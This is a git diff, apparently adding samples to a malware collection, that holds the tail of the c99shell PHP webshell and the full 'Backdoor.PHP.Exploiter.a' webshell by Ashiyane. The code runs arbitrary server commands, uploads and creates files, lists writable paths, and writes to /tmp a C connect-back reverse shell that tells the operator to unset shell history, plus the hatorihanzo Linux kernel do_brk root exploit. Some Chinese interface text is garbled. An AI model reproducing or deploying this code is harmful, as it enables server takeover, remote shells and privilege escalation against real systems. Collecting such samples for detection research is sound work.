+"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV". +"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==", +"write"=> +"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze". +"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61". +"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==", +"ext_asp"=> +"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/". +"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI". +"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=", +"ext_mp3"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU". +"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc". +"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", +"ext_avi"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM". +"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4". +"PYXCyg+V2i44XeRmSfYqsGhAAgA7", +"ext_cgi"=> +"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9". +"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6". +"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S". +"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ". +"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM". +"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD". +"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi". +"RYtMAgEAOw==", +"ext_cmd"=> +"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI". +"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN". +"dmrYAMn1onq/YKpjvEgAADs=", +"ext_cpp"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC". +"WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra". +"Eq7YrLDE7a4SADs=", +"ext_ini"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL". +"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM". +"SnEjgPVarHEHgrB43JvszsQEADs=", +"ext_diz"=> +"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs". +"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv". +"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3". +"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr". +"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX". +"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA". +"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW". +"9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK". +"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm". +"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg". +"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF". +"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA". +"Ow==", +"ext_doc"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR". +"WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq". +"MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=", +"ext_exe"=> +"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7". +"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt". +"xhIAOw==", +"ext_h"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB". +"WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo". +"Wq/NknbbSgAAOw==", +"ext_hpp"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF". +"WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR". +"UqUagnbLdZa+YFcCADs=", +"ext_htaccess"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6". +"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ". +"AAA7", +"ext_html"=> +"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz". +"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P". +"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk". +"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR". +"ADs=", +"ext_jpg"=> +"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci". +"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd". +"FxEAOw==", +"ext_js"=> +"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH". +"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs". +"a00AjYYBbc/o9HjNniUAADs=", +"ext_lnk"=> +"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO". +"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi". +"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk". +"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG". +"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5". +"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf". +"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ". +"ADs=", +"ext_log"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN". +"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==", +"ext_php"=> +"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg". +"t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==", +"ext_pl"=> +"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo". +"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7", +"ext_swf"=> +"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O". +"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". +"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA". +"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC". +"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=", +"ext_tar"=> +"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC". +"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF". +"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD". +"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p". +"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg". +"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd". +"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB". +"u4tLAgEAOw==", +"ext_txt"=> +"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ". +"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7". +"UpPWG3Ig6Hq/XmRjuZwkAAA7", +"ext_wri"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao". +"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=", +"ext_xml"=> +"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA". +"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx". +"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ". +"IQA7" + ); + //For simple size- and speed-optimization. + $imgequals = array( + "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"), + "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"), + "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"), + "ext_html"=>array("ext_html","ext_htm"), + "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"), + "ext_lnk"=>array("ext_lnk","ext_url"), + "ext_ini"=>array("ext_ini","ext_css","ext_inf"), + "ext_doc"=>array("ext_doc","ext_dot"), + "ext_js"=>array("ext_js","ext_vbs"), + "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"), + "ext_wri"=>array("ext_wri","ext_rtf"), + "ext_swf"=>array("ext_swf","ext_fla"), + "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"), + "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so") + ); + if (!$getall) + { + header("Content-type: image/gif"); + header("Cache-control: public"); + header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); + header("Cache-control: max-age=".(60*60*24*7)); + header("Last-Modified: ".date("r",filemtime(__FILE__))); + foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}} + if (empty($images[$img])) {$img = "small_unk";} + if (in_array($img,$ext_tar)) {$img = "ext_tar";} + echo base64_decode($images[$img]); + } + else + { + foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! 删除 \$images[".$d."]
    ");}}}} + natsort($images); + $k = array_keys($images); + echo "
    "; + foreach ($k as $u) {echo $u.":
    ";} + echo "
    "; + } + exit; +} +if ($act == "about") {echo "
    Credits:
    Idea, leading and coding by tristram[CCTeaM].
    Beta-testing and some tips - NukLeoN [AnTiSh@Re tEaM].
    Thanks all who report bugs.
    All bugs send to tristram's ICQ #656555 .
    ";} +?> + +
    + +

    :: 命令执行 ::

    Enter:
      +
    Select:
      +
    +
    + + + + + +

    :: Shadow's tricks :D ::

    +
    实用命令
    +
    +
    + + + + +   + +

    + 警告: 此功能使用需è¦è¾ƒé«˜æƒé™
    +
    +
    +
    + æœåŠ¡å™¨æ“作系统信æ¯: +
    + + + + + + +
    +

    + + + + + +
    :: æœç´¢ :: +
      - regexp  +

    :: 上传 :: +
      +
    +
    :: 创建目录 :: +
      +
    :: 创建文件 :: +
      +
    +
    :: å‰å¾€å·²åˆ›å»ºç›®å½• :: +
      +
    :: å‰å¾€åˆ›å»ºçš„文件 :: +
      +
    +

    --[ c99shell v. powered by Shadow |o0↑謎誷↓0o部分汉化 L.S.T | å应 时间: ]--

    + \ No newline at end of file diff --git a/PHP/Backdoor.PHP.Exploiter.a b/PHP/Backdoor.PHP.Exploiter.a new file mode 100644 index 00000000..f9867b6b --- /dev/null +++ b/PHP/Backdoor.PHP.Exploiter.a @@ -0,0 +1,652 @@ +
    +
    + + Ashiyane Digital Security Team
    +
     

    + /server Irc.Ashiyane.com  + /j #virus  #Ashiyane

    +

    Virus@Ashiyane.com
    +

    + + + + + + + + + + + + + + + + + + + + + + + + + + +
    + :
    + Script Current User:
    + PHP Version:
    + User Info: uid() euid() gid()
    + Current Path:
    + Server IP: +
    + Web Server: +
    +
    +[*] +Command Mode Run
    "; + +?> + +
    + Command Prompt
    +&1"); + $output = ob_get_contents(); + ob_end_clean( ); + +?> + +
    +[*] +Safemode Mode Run"; + +?> +
    + Safe Mode Directory Listing
    +"; + echo ""; + echo ""; + echo "List All Files

    "; + while (($file = readdir($dir)) !== false) { + if (@is_file($file)) { + $file1 = fileowner($file); + $file2 = fileperms($file); + echo "$file1 - $file2 -
    $file
    "; + // echo "$file1 - $file2 - $file
    "; + flush( ); + } + } + + echo ""; + echo""; + echo "List Only Folders +

    "; + if ($dir = @opendir($chdir)) { + while (($file = readdir($dir)) !== false) { + if (@is_dir($file)) { + $file1 = fileowner($file); + $file2 = fileperms($file); + echo "$file1 - $file2 - $file
    "; + // echo "$file1 - $file2 - $file
    "; + } + } + } + echo ""; + echo""; + echo "
    List Writable Folders

    "; + if ($dir = @opendir($chdir)) { + while (($file = readdir($dir)) !== false) { + if (@is_writable($file) && @is_dir($file)) { + $file1 = fileowner($file); + $file2 = fileperms($file); + echo "$file1 - $file2 - $file
    "; + } + } + } + echo ""; + echo ""; + echo ""; + echo "
    List Writable Files

    "; + + if ($dir = opendir($chdir)) { + while (($file = readdir($dir)) !== false) { + if (@is_writable($file) && @is_file($file)) { + $file1 = fileowner($file); + $file2 = fileperms($file); + echo "$file1 - $file2 - $file
    "; + } + } + } + echo ""; + echo ""; + echo ""; + } + } + +?> +\n" . + "#include \n" . + "#include \n" . + "#include \n" . + "#include \n" . + "int main(int argc, char **argv) {\n" . + " char *host;\n" . + " int port = 80;\n" . + " int f;\n" . + " int l;\n" . + " int sock;\n" . + " struct in_addr ia;\n" . + " struct sockaddr_in sin, from;\n" . + " struct hostent *he;\n" . + " char msg[ ] = \"Welcome to Haji virus Connect Back Shell\\n\\n\"\n" . + " \"Issue \\\"export TERM=xterm; exec bash -i\\\"\\n\"\n" . + " \"For More Reliable Shell.\\n\"\n" . + " \"Issue \\\"unset HISTFILE; unset SAVEHIST\\\"\\n\"\n" . + " \"For Not Getting Logged.\\n(;\\n\\n\";\n" . + " printf(\"Haji virus Connect Back Backdoor\\n\\n\");\n" . + " if (argc < 2 || argc > 3) {\n" . + " printf(\"Usage: %s [Host] \\n\", argv[0]);\n" . + " return 1;\n" . + " }\n" . + " printf(\"[*] Dumping Arguments\\n\");\n" . + " l = strlen(argv[1]);\n" . + " if (l <= 0) {\n" . + " printf(\"[-] Invalid Host Name\\n\");\n" . + " return 1;\n" . + " }\n" . + " if (!(host = (char *) malloc(l))) {\n" . + " printf(\"[-] Unable to Allocate Memory\\n\");\n" . + " return 1;\n" . + " }\n" . + " strncpy(host, argv[1], l);\n" . + " if (argc == 3) {\n" . + " port = atoi(argv[2]);\n" . + " if (port <= 0 || port > 65535) {\n" . + " printf(\"[-] Invalid Port Number\\n\");\n" . + " return 1;\n" . + " }\n" . + " }\n" . + " printf(\"[*] Resolving Host Name\\n\");\n" . + " he = gethostbyname(host);\n" . + " if (he) {\n" . + " memcpy(&ia.s_addr, he->h_addr, 4);\n" . + " } else if ((ia.s_addr = inet_addr(host)) == INADDR_ANY) {\n" . + " printf(\"[-] Unable to Resolve: %s\\n\", host);\n" . + " return 1;\n" . + " }\n" . + " sin.sin_family = PF_INET;\n" . + " sin.sin_addr.s_addr = ia.s_addr;\n" . + " sin.sin_port = htons(port);\n" . + " printf(\"[*] Connecting...\\n\");\n" . + " if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {\n" . + " printf(\"[-] Socket Error\\n\");\n" . + " return 1;\n" . + " }\n" . + " if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {\n" . + " printf(\"[-] Unable to Connect\\n\");\n" . + " return 1;\n" . + " }\n" . + " printf(\"[*] Spawning Shell\\n\");\n" . + " f = fork( );\n" . + " if (f < 0) {\n" . + " printf(\"[-] Unable to Fork\\n\");\n" . + " return 1;\n" . + " } else if (!f) {\n" . + " write(sock, msg, sizeof(msg));\n" . + " dup2(sock, 0);\n" . + " dup2(sock, 1);\n" . + " dup2(sock, 2);\n" . + " execl(\"/bin/sh\", \"shell\", NULL);\n" . + " close(sock);\n" . + " return 0;\n" . + " }\n" . + " printf(\"[*] Detached\\n\\n\");\n" . + " return 0;\n" . + "}\n"; + + $fp = fopen("/tmp/dc-connectback.c", "w"); + $ok = fwrite($fp, $shell); + + if (!empty($ok)) { + echo "
    [*] Connect Back Shell Was Successfuly Copied
    "; + } else { + echo "
    [-] An Error Has Ocurred While Copying Shell
    "; + } + } + + if ($kernel == "write") { + $kernel = "/*\n" . + " * hatorihanzo.c\n" . + " * Linux kernel do_brk vma overflow exploit.\n" . + " *\n" . + " * The bug was found by Paul (IhaQueR) Starzetz \n" . + " *\n" . + " * Further research and exploit development by\n" . + " * Wojciech Purczynski and Paul Starzetz.\n" . + " *\n" . + " * (c) 2003 Copyright by IhaQueR and cliph. All Rights Reserved.\n" . + " *\n" . + " * COPYING, PRINTING, DISTRIBUTION, MODIFICATION, COMPILATION AND ANY USE\n" . + " * OF PRESENTED CODE IS STRICTLY PROHIBITED.\n" . + "*/\n" . + "#define _GNU_SOURCE\n" . + "#include \n" . + "#include \n" . + "#include \n" . + "#include \n" . + "#include \n" . + "#include \n" . + "#include \n" . + "#include \n" . + "#include \n" . + "#include \n" . + "#include \n" . + "#include \n" . + "#include \n" . + "#include \n" . + "#include \n" . + "#include \n" . + "#include \n" . + "#include \n" . + "#include \n" . + "#include \n" . + "#include \n" . + "#define kB * 1024\n" . + "#define MB * 1024 kB\n" . + "#define GB * 1024 MB\n" . + "#define MAGIC 0xdefaced /* I should've patented this number -cliph */\n" . + "#define ENTRY_MAGIC 0\n" . + "#define ENTRY_GATE 2\n" . + "#define ENTRY_CS 4\n" . + "#define ENTRY_DS 6\n" . + "#define CS ((ENTRY_CS << 2) | 4)\n" . + "#define DS ((ENTRY_DS << 2) | 4)\n" . + "#define GATE ((ENTRY_GATE << 2) | 4 | 3)\n" . + "#define LDT_PAGES ((LDT_ENTRIES*LDT_ENTRY_SIZE+PAGE_SIZE-1) / PAGE_SIZE)\n" . + "#define TOP_ADDR 0xFFFFE000U\n" . + "/* configuration */\n" . + "unsigned task_size;\n" . + "unsigned page;\n" . + "uid_t uid;\n" . + "unsigned address;\n" . + "int dontexit = 0;\n" . + "void fatal(char * msg)\n" . + "{\n" . + " fprintf(stderr, \"[-] %s: %s\\n\", msg, strerror(errno));\n" . + " if (dontexit) {\n" . + " fprintf(stderr, \"[-] Unable to exit, entering neverending loop.\\n\");\n" . + " kill(getpid(), SIGSTOP);\n" . + " for (;;) pause();\n" . + " }\n" . + " exit(EXIT_FAILURE);\n" . + "}\n" . + "void configure(void)\n" . + "{\n" . + " unsigned val;\n" . + " task_size = ((unsigned)&val + 1 GB ) / (1 GB) * 1 GB;\n" . + " uid = getuid();\n" . + "}\n" . + "void expand(void)\n" . + "{\n" . + " unsigned top = (unsigned) sbrk(0);\n" . + " unsigned limit = address + PAGE_SIZE;\n" . + " do {\n" . + " if (sbrk(PAGE_SIZE) == NULL)\n" . + " fatal(\"Kernel seems not to be vulnerable\");\n" . + " dontexit = 1;\n" . + " top += PAGE_SIZE;\n" . + " } while (top < limit);\n" . + "}\n" . + "jmp_buf jmp;\n" . + "#define MAP_NOPAGE 1\n" . + "#define MAP_ISPAGE 2\n" . + "void sigsegv(int signo, siginfo_t * si, void * ptr)\n" . + "{\n" . + " struct ucontext * uc = (struct ucontext *) ptr;\n" . + " int error_code = uc->uc_mcontext.gregs[REG_ERR];\n" . + " (void)signo;\n" . + " (void)si;\n" . + " error_code = MAP_NOPAGE + (error_code & 1);\n" . + " longjmp(jmp, error_code);\n" . + "}\n" . + "void prepare(void)\n" . + "{\n" . + " struct sigaction sa;\n" . + " sa.sa_sigaction = sigsegv;\n" . + " sa.sa_flags = SA_SIGINFO | SA_NOMASK;\n" . + " sigemptyset(&sa.sa_mask);\n" . + " sigaction(SIGSEGV, &sa, NULL);\n" . + "}\n" . + "int testaddr(unsigned addr)\n" . + "{\n" . + " int val;\n" . + " val = setjmp(jmp);\n" . + " if (val == 0) {\n" . + " asm (\"verr (%%eax)\" : : \"a\" (addr));\n" . + " return MAP_ISPAGE;\n" . + " }\n" . + " return val;\n" . + "}\n" . + "#define map_pages (((TOP_ADDR - task_size) + PAGE_SIZE - 1) / PAGE_SIZE)\n" . + "#define map_size (map_pages + 8*sizeof(unsigned) - 1) / (8*sizeof(unsigned))\n" . + "#define next(u, b) do { if ((b = 2*b) == 0) { b = 1; u++; } } while(0)\n" . + "void map(unsigned * map)\n" . + "{\n" . + " unsigned addr = task_size;\n" . + " unsigned bit = 1;\n" . + " prepare();\n" . + " while (addr < TOP_ADDR) {\n" . + " if (testaddr(addr) == MAP_ISPAGE)\n" . + " *map |= bit;\n" . + " addr += PAGE_SIZE;\n" . + " next(map, bit);\n" . + " }\n" . + " signal(SIGSEGV, SIG_DFL);\n" . + "}\n" . + "void find(unsigned * m)\n" . + "{\n" . + " unsigned addr = task_size;\n" . + " unsigned bit = 1;\n" . + " unsigned count;\n" . + " unsigned tmp;\n" . + " prepare();\n" . + " tmp = address = count = 0U;\n" . + " while (addr < TOP_ADDR) {\n" . + " int val = testaddr(addr);\n" . + " if (val == MAP_ISPAGE && (*m & bit) == 0) {\n" . + " if (!tmp) tmp = addr;\n" . + " count++;\n" . + " } else {\n" . + " if (tmp && count == LDT_PAGES) {\n" . + " errno = EAGAIN;\n" . + " if (address)\n" . + " fatal(\"double allocation\\n\");\n" . + " address = tmp;\n" . + 